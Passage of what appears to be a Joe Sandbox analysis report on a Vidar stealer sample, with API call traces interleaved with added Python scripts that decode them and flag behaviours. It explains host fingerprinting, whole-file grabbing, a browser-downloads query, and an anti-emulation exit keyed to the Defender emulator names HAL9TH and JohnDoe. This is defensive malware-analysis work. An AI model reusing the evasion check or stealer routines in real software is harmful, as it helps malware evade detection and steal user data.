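          0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
          0x80000005: "HKEY_CURRENT_CONFIG"}
_KEY_RIGHTS = [(0x00001, "KEY_QUERY_VALUE"), (0x00002, "KEY_SET_VALUE"),
               (0x00004, "KEY_CREATE_SUB_KEY"), (0x00008, "KEY_ENUMERATE_SUB_KEYS"),
               (0x00010, "KEY_NOTIFY"), (0x00020, "KEY_CREATE_LINK"),
               (0x00100, "KEY_WOW64_64KEY"), (0x00200, "KEY_WOW64_32KEY"),
               (0x10000, "DELETE"), (0x20000, "READ_CONTROL"),
               (0x40000, "WRITE_DAC"), (0x80000, "WRITE_OWNER")]
KEY_READ = 0x20019   # READ_CONTROL | QUERY_VALUE | ENUMERATE_SUB_KEYS | NOTIFY
_ALL_RIGHTS = sum(bit for bit, _ in _KEY_RIGHTS)

def decode_access(mask):
    """Expand a REGSAM mask; the KEY_READ composite is reported as one name."""
    names = []
    if mask & KEY_READ == KEY_READ:
        names.append("KEY_READ")
        mask &= ~KEY_READ
    names += [name for bit, name in _KEY_RIGHTS if mask & bit]
    if mask & ~_ALL_RIGHTS:
        names.append(f"0x{mask & ~_ALL_RIGHTS:X}")
    return names

def decode_reg_open(call):
    """Hive and access rights of a RegOpenKeyExA call.  The hive handle is the first
    slot; the REGSAM is found by bit pattern (assumption, see lead-in)."""
    if call.api != "RegOpenKeyExA":
        raise ValueError("not a RegOpenKeyExA call")
    hive = _hex(call.args[0])
    sam = next((v for v in map(_hex, call.args[1:5]) if v and v & _ALL_RIGHTS), None)
    return {"hive": _HIVES.get(hive, f"0x{hive:08X}"),
            "access": decode_access(sam) if sam is not None else []}

def fingerprint_indicators(calls):
    """Host-profiling behaviour visible in the trace, one line per finding."""
    found = []
    for c in calls:
        if c.api == "RegQueryValueExA" and len(c.args) > 1 and c.args[1] == "CurrentBuildNumber":
            found.append(f"{c.ref:08X}: reads CurrentBuildNumber (OS build fingerprint)")
        elif c.api == "GlobalMemoryStatusEx":
            found.append(f"{c.ref:08X}: queries physical memory size (formatted as '%d MB')")
        elif c.api == "InternetCrackUrlA":
            found.append(f"{c.ref:08X}: splits a URL into components before the HTTP request")
    return found

if __name__ == "__main__":
    trace = parse_trace(SAMPLE_TRACE)
    for call in trace:
        if call.api == "RegOpenKeyExA":
            print(decode_reg_open(call))
    print("\n".join(fingerprint_indicators(trace)))
```

Decoding the mask is what turns `00020119` from a number into a finding: it is KEY_READ plus KEY_WOW64_64KEY, so this 32-bit process deliberately reads the 64-bit registry view, which is what a stealer that reports the host OS version to its operator has to do to avoid the WOW64 redirected keys.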
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000,?,Windows: ,00000000), ref: 0034E77D
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678), ref: 0034E784
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000,?,Windows: ), ref: 0034E7A2
                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000), ref: 0034E7BD
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678), ref: 0034E7C6
                                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Heap$AllocCloseOpenProcessQueryValue
• String ID: CurrentBuildNumber
• API String ID: 3466090806-1022791448
• Opcode ID: d5374626b5b1ab8efc52818fadd754990100f99c7fd59500ff6a5b5dc5f19396
• Instruction ID: 122c041dd1187019274384eeb0febc29438123bde858fc163c79e159385cc567
• Opcode Fuzzy Hash: d5374626b5b1ab8efc52818fadd754990100f99c7fd59500ff6a5b5dc5f19396
• Instruction Fuzzy Hash: 37F03075144204BFEB119BD1DC0EFAE7ABCEB44B44F104068F606A90A1DAB06A819B24
APIs
• memset.MSVCRT ref: 00353ABD
• RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?), ref: 00353ADA
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?), ref: 00353AFA
• RegCloseKey.ADVAPI32(?), ref: 00353B03
• lstrcatA.KERNEL32(?,?,?,00000104), ref: 00353B29
• lstrcatA.KERNEL32(?), ref: 00353B3C
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true (associated dumps and IDA snapshot identical to the first entry above)
Yara matches
Similarity
• API ID: lstrcat$CloseOpenQueryValuememset
• String ID:
• API String ID: 2623679115-0
• Opcode ID: ee93e36e138b3108d331e38aaebbf68dc49228518c8da63f1e367533a03a770a
• Instruction ID: 6301728beada7fbd6c70a621eecedea021a372d4d0030a839efcda53cfc1380f
• Opcode Fuzzy Hash: ee93e36e138b3108d331e38aaebbf68dc49228518c8da63f1e367533a03a770a
• Instruction Fuzzy Hash: 9B4179B690010DBBDF11EFF0CC46DED7BBCAB04344F0045A1F9499A161E671AB998FA1
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
• GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
• LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
• ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
• LocalFree.KERNEL32(?,?,0035E266), ref: 00346A23
• CloseHandle.KERNEL32(?), ref: 00346A2E
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true (associated dumps and IDA snapshot identical to the first entry above)
Yara matches
Similarity
• API ID: File$Local$AllocCloseCreateFreeHandleReadSize
• String ID:
• API String ID: 2311089104-0
• Opcode ID: d969a12c382c4be13e29490fb39b39ec68e13046e31c4656311001693087d2be
• Instruction ID: df7ba9818f57ac525f3a3ee99ad4d7939da98e4541fd355cb0b10accb245c3a9
• Opcode Fuzzy Hash: d969a12c382c4be13e29490fb39b39ec68e13046e31c4656311001693087d2be
• Instruction Fuzzy Hash: BD1130B1510505AFEB11EFE4DC8ADAE7BBCFB05354F148429FA02EA150DB30AE95CB61
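The three API listings above (the HKLM read of CurrentBuildNumber, the HKCU default-value read followed by lstrcatA into a 0x104-byte buffer, and the CreateFileA / GetFileSizeEx / LocalAlloc / ReadFile sequence) are the kind of static call summary an analyst decodes by hand: the raw DWORDs are Windows SDK constants, and the call order says what the function is for. The Python below is an added example, not Joe Sandbox or Vidar code. It parses call lines in the printed shape, names the constants, and emits behaviour tags; it also covers the GetCurrentHwProfileA call that the next entry lists. The constant values come from the SDK headers; the rule that the first DWORD carrying STANDARD_RIGHTS bits is samDesired is a heuristic (the listing does not keep the documented argument positions), the extra value names CurrentVersion and ProductName and the tag vocabulary are assumptions of this example, and the sample entries are constructed by copying the lines above with their stack-context tails trimmed.

```python
"""Decode Joe Sandbox per-function "APIs" listings into Win32 constant names and
behaviour tags.  Added example, not Joe Sandbox or Vidar code.  Assumed line shape
(as printed above): "• Api.MODULE(arg,...), ref: ADDR"; "?" is an unresolved
argument, 8 hex digits are a raw DWORD, anything else is a resolved string."""
import re

# Windows SDK constants (winreg.h, winnt.h, fileapi.h, winbase.h).
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_READ = 0x20019          # STANDARD_RIGHTS_READ|QUERY_VALUE|ENUMERATE_SUB_KEYS|NOTIFY
KEY_WOW64_64KEY, KEY_WOW64_32KEY = 0x0100, 0x0200   # explicit 64-/32-bit registry view
GENERIC_READ, OPEN_EXISTING = 0x80000000, 3
ALLOCATORS = {"LocalAlloc", "HeapAlloc", "VirtualAlloc", "malloc"}
# CurrentBuildNumber is what this sample reads; the other two are assumed companions.
OS_FINGERPRINT_VALUES = {"CurrentBuildNumber", "CurrentVersion", "ProductName"}
CALL_RE = re.compile(r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Constructed samples: the call lines of the entries above, stack-context tails trimmed.
ENTRY_OS_BUILD = """
• HeapAlloc.KERNEL32(00000000,?,?,?), ref: 0034E784
• RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?), ref: 0034E7A2
• RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 0034E7BD
• RegCloseKey.ADVAPI32(?), ref: 0034E7C6
"""
ENTRY_HKCU_VALUE = """
• memset.MSVCRT ref: 00353ABD
• RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?), ref: 00353ADA
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?), ref: 00353AFA
• RegCloseKey.ADVAPI32(?), ref: 00353B03
• lstrcatA.KERNEL32(?,?,?,00000104), ref: 00353B29
"""
ENTRY_FILE_READ = """
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
• GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
• LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
• ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
• CloseHandle.KERNEL32(?), ref: 00346A2E
"""
ENTRY_HWID = "• GetCurrentHwProfileA.ADVAPI32(?), ref: 0034EFCA\n"

def parse_arg(raw):
    raw = raw.strip()
    return None if raw == "?" else int(raw, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", raw) else raw

def parse_entry(text):
    """One entry's API lines -> [{'api', 'module', 'args', 'ref'}, ...] in call order."""
    calls = []
    for m in filter(None, map(CALL_RE.search, text.splitlines())):
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["mod"], "args": args, "ref": int(m["ref"], 16)})
    return calls

def describe_key_access(mask):
    """samDesired mask -> SDK names, e.g. 0x20119 -> 'KEY_READ|KEY_WOW64_64KEY'."""
    names = []
    for bits, name in ((KEY_READ, "KEY_READ"), (KEY_WOW64_64KEY, "KEY_WOW64_64KEY"),
                       (KEY_WOW64_32KEY, "KEY_WOW64_32KEY")):
        if mask & bits == bits:
            names.append(name)
            mask &= ~bits
    return "|".join(names + ([hex(mask)] if mask else []))

def reg_access_mask(args):
    """Heuristic: the first DWORD with STANDARD_RIGHTS bits set is samDesired (the
    static listing above does not keep the documented argument positions)."""
    return next((a for a in args if isinstance(a, int) and a & 0x20000 and a < 0x100000), None)

def in_order(apis, pattern):
    """True if the call sequence contains pattern (a list of API-name sets) in order."""
    it = iter(apis)
    return all(any(api in step for api in it) for step in pattern)

def tag_entry(text):
    """Behaviour tags for one function entry (the tag vocabulary is this example's own)."""
    calls, tags = parse_entry(text), set()
    for c in calls:
        api, args = c["api"], c["args"]
        if api.startswith("RegOpenKeyEx"):
            if args and args[0] in HKEY_ROOTS:
                tags.add("registry_read:" + HKEY_ROOTS[args[0]])
            mask = reg_access_mask(args)
            if mask is not None and mask & KEY_WOW64_64KEY:
                tags.add("registry_wow64_64_view")
        elif api.startswith("RegQueryValueEx") and len(args) > 1:
            if args[1] == 0:                     # lpValueName == NULL: the key's default value
                tags.add("registry_default_value_read")
            elif args[1] in OS_FINGERPRINT_VALUES:
                tags.add("os_fingerprint:" + args[1])
        elif api.startswith("CreateFile") and len(args) > 4:
            if args[1] == GENERIC_READ and args[4] == OPEN_EXISTING:
                tags.add("file_open_read_existing")
        elif api.startswith("GetCurrentHwProfile"):
            tags.add("hwid_collection")
    # open -> size -> allocate -> read: the whole file is pulled into memory (stealer file grab)
    if "file_open_read_existing" in tags and in_order([c["api"] for c in calls],
            [{"CreateFileA", "CreateFileW"}, {"GetFileSizeEx", "GetFileSize"}, ALLOCATORS, {"ReadFile"}]):
        tags.add("file_read_to_memory")
    return tags
```

Two things this surfaces that are easy to miss when skimming the listing: the access mask 00020119 decodes to KEY_READ | KEY_WOW64_64KEY, so this 32-bit sample explicitly asks for the unredirected 64-bit registry view rather than relying on WOW64 redirection, and the CreateFileA entry is an allocate-to-file-size-then-ReadFile routine, the primitive a stealer uses to grab whole files into memory before exfiltration. The subkey and file names themselves are unresolved ("?") in this static listing, so the decoder deliberately does not guess them; pair the tags with the dynamic behaviour sections of the report for those.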
APIs
• memset.MSVCRT ref: 0034EFF5
  • Part of subcall function 0034FC4F: malloc.MSVCRT ref: 0034FC58
  • Part of subcall function 0034FC4F: strncpy.MSVCRT ref: 0034FC68
• lstrcatA.KERNEL32(?,00000000), ref: 0034F025
• lstrcatA.KERNEL32(?,003618AC), ref: 0034F03F
• GetCurrentHwProfileA.ADVAPI32(?), ref: 0034EFCA
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true (associated dumps and IDA snapshot identical to the first entry above)
Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$CurrentProfilelstrcpymallocmemsetstrncpy
                                                                                                                                                                                      • String ID: Unknown
                                                                                                                                                                                      • API String ID: 277847849-1654365787
                                                                                                                                                                                      • Opcode ID: 8e4691a3db0015e82c1eb05b0faa0e2983cae7a1642b2a2463f780018c8862a3
                                                                                                                                                                                      • Instruction ID: fd9ed0778b2fa4d534a86804a01fbe5098eccdf600c84e1a00cc51e45018a0cb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e4691a3db0015e82c1eb05b0faa0e2983cae7a1642b2a2463f780018c8862a3
                                                                                                                                                                                      • Instruction Fuzzy Hash: FC110D71D00109ABDB15EBB0DC96EDD77AC6B01304F4445A6B20AAF091EE70A785CB90
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E816: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E822
                                                                                                                                                                                        • Part of subcall function 0034E816: HeapAlloc.KERNEL32(00000000,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E829
                                                                                                                                                                                        • Part of subcall function 0034E816: GetComputerNameA.KERNEL32(00000000,?), ref: 0034E83D
                                                                                                                                                                                      • strcmp.MSVCRT ref: 0034104E
                                                                                                                                                                                        • Part of subcall function 0034E7E4: GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F0
                                                                                                                                                                                        • Part of subcall function 0034E7E4: HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F7
                                                                                                                                                                                        • Part of subcall function 0034E7E4: GetUserNameA.ADVAPI32(00000000,?), ref: 0034E80B
                                                                                                                                                                                      • strcmp.MSVCRT ref: 00341064
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00341070
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
                                                                                                                                                                                      • String ID: HAL9TH$JohnDoe
                                                                                                                                                                                      • API String ID: 2098570390-3469431008
                                                                                                                                                                                      • Opcode ID: 93dbde9aba6735ddb8b4640e15453dca2e3bf812afebb5d2a8124f1dc19d439b
                                                                                                                                                                                      • Instruction ID: 58437d2a5f9d451c4f122597da74456d20e768aeb24a9bc98594534105f588cf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 93dbde9aba6735ddb8b4640e15453dca2e3bf812afebb5d2a8124f1dc19d439b
                                                                                                                                                                                      • Instruction Fuzzy Hash: F9D0C966D48F0316BD3B7AB66C0BC0A26DC6A017A6B208916F812DD4A6ED94F6846022
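The APIs list above for the function at 0x341000 is the sample's emulator check: a helper fetches the computer name, the function compares it with strcmp, a second helper fetches the user name, a second strcmp follows, then ExitProcess. HAL9TH and JohnDoe are the computer and user name of the Microsoft Defender antivirus emulator, so a match means the sample is being emulated and it quits before doing anything observable. The script below is an added example, not part of the Joe Sandbox report or the malware: it parses this report format's API lines (the sample text is copied from the list above), recovers the string literals the sandbox resolved, and applies a small heuristic for the identity-lookup, compare, ExitProcess shape. The IDENTITY_APIS and COMPARE_APIS sets and the heuristic itself are this example's assumptions; the call list shows the order of the two compares but not how their results are combined.

```python
"""Parse the 'APIs' call list of a Joe Sandbox function entry and flag the
host-fingerprint-then-exit shape seen in this Vidar sample.

Added example, not part of the report. SAMPLE_TRACE is copied from the
report's own API list for the function at 0x341000; the heuristic and its
API-name sets are this example's assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Copied verbatim from the report (helper calls carry the 'Part of subcall function' prefix).
SAMPLE_TRACE = """
• Part of subcall function 0034E816: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E822
• Part of subcall function 0034E816: HeapAlloc.KERNEL32(00000000,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E829
• Part of subcall function 0034E816: GetComputerNameA.KERNEL32(00000000,?), ref: 0034E83D
• strcmp.MSVCRT ref: 0034104E
• Part of subcall function 0034E7E4: GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F0
• Part of subcall function 0034E7E4: HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F7
• Part of subcall function 0034E7E4: GetUserNameA.ADVAPI32(00000000,?), ref: 0034E80B
• strcmp.MSVCRT ref: 00341064
• ExitProcess.KERNEL32 ref: 00341070
"""

# One APIs line: optional helper prefix, API.module, optional (args), call-site address.
_LINE = re.compile(
    r"^\s*\u2022\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
_HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")

# Assumed name sets for the heuristic (not from the report).
IDENTITY_APIS = {"GetComputerNameA", "GetComputerNameW", "GetUserNameA", "GetUserNameW"}
COMPARE_APIS = {"strcmp", "lstrcmpA", "lstrcmpW", "lstrcmpiA", "lstrcmpiW"}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                       # address of the call instruction
    args: List[str] = field(default_factory=list)
    subcall: Optional[int] = None  # helper function this call was made from, if nested


def parse_trace(text: str) -> List[ApiCall]:
    """Turn the report's API list into structured calls, in report order."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), int(m.group("ref"), 16),
                             args, int(sub, 16) if sub else None))
    return calls


def string_literals(calls: List[ApiCall]) -> List[str]:
    """Arguments the sandbox resolved to text, in first-seen order.
    Heuristic: anything that is not '?' and not a 32-bit hex value. A real
    string of exactly eight hex digits would be dropped; acceptable for triage."""
    seen: List[str] = []
    for c in calls:
        for a in c.args:
            if a != "?" and not _HEX32.match(a) and a not in seen:
                seen.append(a)
    return seen


def fingerprint_then_exit(calls: List[ApiCall]) -> List[str]:
    """Return the identity APIs seen (helpers included) when the function's own
    call stream (helpers excluded) does a string compare and later ExitProcess.
    Empty list when that shape is absent. Only the order of the compares is
    visible in the list, not how their results are combined."""
    identity = [c.api for c in calls if c.api in IDENTITY_APIS]
    direct = sorted((c for c in calls if c.subcall is None), key=lambda c: c.ref)
    compared = False
    for c in direct:
        if c.api in COMPARE_APIS:
            compared = True
        elif c.api == "ExitProcess" and compared and identity:
            return identity
    return []


if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    for c in calls:
        where = f"via {c.subcall:08X}" if c.subcall else "direct"
        print(f"{c.ref:08X} {c.api}.{c.module} [{where}]")
    print("strings:", string_literals(calls))
    print("fingerprint-then-exit:", fingerprint_then_exit(calls))
```

The same parser can be pointed at any other function entry on this page; the heuristic only fires when a direct compare precedes a direct ExitProcess and some identity lookup occurred, so the string-building functions elsewhere in the report return an empty list.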
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 1475443563-4108050209
                                                                                                                                                                                      • Opcode ID: 5e6f3149d2315a7f97a97c29b0eb816d1210dd2dcce0a1c73a13da43e11864dd
                                                                                                                                                                                      • Instruction ID: 3bb57cbd4086e38ca070a1eb41e2420ec87b0c0feb17810d174f813009c16240
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e6f3149d2315a7f97a97c29b0eb816d1210dd2dcce0a1c73a13da43e11864dd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 66127D70F05255CFEB05CFA8E484789BBF1AF48318F25C1A9D845AB356D774E88ACB80
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00347B02
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00347B16
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                      • String ID: Downloads$SELECT target_path, tab_url from downloads$f5
                                                                                                                                                                                      • API String ID: 2500673778-2057624107
                                                                                                                                                                                      • Opcode ID: 06b4b951b7e1372539f0af0baa09f6e0145ce245e05ac2fbc233195266e32838
                                                                                                                                                                                      • Instruction ID: 83e92827df5fa236e997c97b946db329538b45ab51714390891a456c36f7dac7
